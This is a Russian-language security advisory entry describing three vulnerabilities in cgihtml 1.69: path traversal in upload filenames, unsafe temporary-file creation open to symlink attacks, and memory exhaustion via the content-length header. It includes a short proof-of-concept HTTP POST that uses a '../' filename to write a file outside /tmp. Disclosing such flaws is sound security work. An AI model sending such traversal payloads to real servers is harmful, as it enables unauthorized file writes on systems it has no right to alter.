Дата публикации: | 08.01.2003 |
Всего просмотров: | 1509 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Cgihtml – набор подпрограмм для анализа CGI ввода и создания на его основе HTML кода. В программе обнаружено несколько уязвимостей: 1. Небезопасное использование временных файлов При обработки формы загрузки файла на сервер (content type 'multipart/form-data'), cgihtml пытается создать фай в системном system /tmp каталоге, используя имя, обеспеченное пользователем, не делая никаких проверок на этом имени. Уязвимость позволяет записывать файл в любое место на файловой системе вне /tmp каталога, используя имя файла с путем, содержащим ' ../. 2. Небезопасное создание временных файлов При создании временного файла, не проверяется его предварительное существование. Уязвимость позволяет локальному атакующему создать символьную ссылку к произвольному чувствительному файлу, который будет перезаписан при попытке создать временный файл. 3. Уязвимость в интерпретации content-length заголовка cgihtml выделяет память, используя значение content-length, снабженное пользователем. Атакующий может представить чрезмерно длинное значение content-length, которое вызовет исчерпание всей доступной памяти. Эксплоит (к 1 уязвимости) POST http://someserver.com/blah.cgi HTTP/1.0 User-Agent: Haxor Content-Type: multipart/form-data; boundary=#123456789#multipart#boundary#1234567890# Content-Length: 282 --#123456789#multipart#boundary#1234567890# Content-Disposition: form-data; name="Haxor"; filename="../../../tmp/haxor.html" <HTML> <HEAD><TITLE>Haxor</TITLE></HEAD> <BODY><H1>This page should not be here</H1></BODY> </HTML> --#123456789#multipart#boundary#1234567890#--Уязвимость обнаружена в cgihtml 1.69 |
Ссылки: | Multiple cgihtml vulnerabilities |